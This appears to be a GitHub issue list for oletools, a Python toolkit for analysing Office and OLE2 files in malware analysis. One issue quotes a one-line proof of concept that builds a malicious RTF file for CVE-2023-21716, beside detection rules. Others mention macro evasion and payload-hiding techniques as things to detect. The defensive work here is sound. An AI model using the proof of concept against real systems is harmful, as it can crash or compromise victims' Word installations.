oletools
oletools copied to clipboard
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
All oletools unit tests pass with pyparsing 3.0.9 installed. This makes it easier to use oletools as a library.
_extract_xlm_plugin_biff adds xlm_macro even if there is no Excel 4.0 macro sheet exist
Processing the same file went from 50s to 7s.
See https://twitter.com/SI_FalconTeam/status/1633114934253965314 (YARA rule) Another YARA rule: https://github.com/AmgdGocha/Detection-Rules/blob/main/CVE-2023-21716.yar PoC: https://twitter.com/jduck/status/1632471544935923712 ``` open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) ``` See also https://github.com/gyaansastra/CVE-2023-21716
Hello. I checked DDE in some malware .doc samples and found a malware doc that contained DDE but was not detected by the msodde. I did a little research and...
Hi, is it possible to sanitize vbaProject.bin (remove pCode) via oletools? I'm not interested in dumping the pCode but only in removing it completly in a way that Office reports...
**Affected tool:** olevba **Describe the bug** olevba does not extract the macro in the office file correctly. Although the macro works correctly, olevba seems to be broken because it incorrectly...
check all the keywords mentioned in https://www.countercept.com/blog/dechaining-macros-and-evading-edr
See https://inquest.net/blog/2022/10/03/hiding-xml for an example of VBA macro using CustomXML to store a payload. Also a new keyword `ActiveDocument.CustomXMLParts` to be added: https://learn.microsoft.com/en-us/office/vba/api/Office.CustomXMLParts
This is a summary of single-commit branches I gathered over the years. Each commit explains itself. This is not for merging as-is but rather for cherry-picking individual commits. If that...